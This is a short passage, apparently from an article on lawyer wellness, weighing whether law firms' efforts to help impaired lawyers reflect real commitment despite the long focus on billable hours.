Systemic progress is happening. Still, it is legitimate to ask whether the efforts by law firms outlined above are “enough” or whether there is a real commitment to them. Let’s face it, billable hours have been the holy grail for a very long time. While skepticism is fair, we think firms recognize (maybe for the first time) the true extent and cost of impaired lawyers. That recognition, coupled with a commitment to provide effective and confidential help to lawyers in need of assistance, is a good sign of what we hope will be a long-term effort to make sure that lawyer wellness is a core concern of every law firm and legal entity.
